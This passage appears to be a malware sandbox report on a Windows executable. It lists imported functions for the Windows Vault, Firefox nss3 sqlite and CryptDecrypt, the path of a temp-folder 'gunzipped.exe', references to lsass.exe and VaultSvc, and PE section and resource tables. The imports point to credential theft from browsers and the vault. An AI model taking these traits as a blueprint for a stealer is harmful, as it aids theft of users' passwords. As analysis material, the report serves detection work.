vaultcli.dll.VaultCloseVault
nss3.dll.sqlite3_finalize
nss3.dll.sqlite3_step
nss3.dll.sqlite3_close
nss3.dll.sqlite3_column_text
nss3.dll.sqlite3_open16
nss3.dll.sqlite3_prepare_v2
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\Louise\AppData\Local\Temp\gunzipped.exe"
C:\Windows\system32\lsass.exe
300134BE5A3EACE282B993B6
VaultSvc

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x0046282c 0x00000000 0x000acfc1 4.0 1992-06-19 22:22:17 a3bfafd3839d7a926bcc393a99921236 b196788ae84ca5d7e6327df18fc58a89 0ab954406964a00a463561e23b1fff82

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00000400 0x00001000 0x00061874 0x00061a00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.52
DATA 0x00061e00 0x00063000 0x0000ae28 0x0000b000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.02
BSS 0x0006ce00 0x0006e000 0x00000bf9 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x0006ce00 0x0006f000 0x000022b0 0x00002400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.95
.tls 0x0006f200 0x00072000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x0006f200 0x00073000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.20
.reloc 0x0006f400 0x00074000 0x00007188 0x00007200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.65
.rsrc 0x00076600 0x0007c000 0x00029594 0x00029600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.96

Resources

Name Offset Size Language Sub-language Entropy File type
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
